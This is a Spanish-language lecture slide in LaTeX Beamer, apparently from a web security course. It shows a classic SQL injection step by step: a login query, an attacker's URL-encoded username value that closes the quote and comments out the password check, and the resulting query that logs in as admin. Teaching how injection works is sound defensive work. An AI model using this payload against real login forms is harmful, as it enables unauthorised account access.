\frametitle{Inyección SQL: ejemplo trivial 2/2}
	\begin{exampleblock}{Posible SQL en la aplicación}
		\begin{verbatim}
		select * from Users where (username = 'submittedUser'
		and password = 'submittedPassword');
		\end{verbatim}
	\end{exampleblock}
	\begin{exampleblock}{Envío del atacante}
	\begin{verbatim}
	username=admin%27%29+--+&password=+
	\end{verbatim}
\end{exampleblock}
\begin{exampleblock}{Consulta resultante}
	\begin{verbatim}
	select * from Users where (username = 'admin') --
	and password = ' ');
	\end{verbatim}
\end{exampleblock}
